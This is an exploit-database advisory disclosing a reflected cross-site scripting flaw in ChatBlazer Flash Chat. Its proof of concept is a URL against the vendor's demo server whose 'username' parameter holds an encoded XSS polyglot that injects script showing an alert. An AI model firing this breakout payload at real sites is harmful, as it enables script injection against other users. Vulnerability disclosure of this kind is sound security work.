ChatBlazer Flash Chat Cross Site Scripting

2012.04.20
Credit: Sony
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ChatBlazer Flash Chat Cross Site Scripting # Date: 19.04.2012 # Author: Sony # Software Link: www.chatblazer.com/ # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html ................................................................. Well, we have cross site scripting in ChatBlazer. We can use Demo. (simple example) http://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0 http://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s1600/chat.JPG

References:

http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html
http://st2tea.blogspot.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top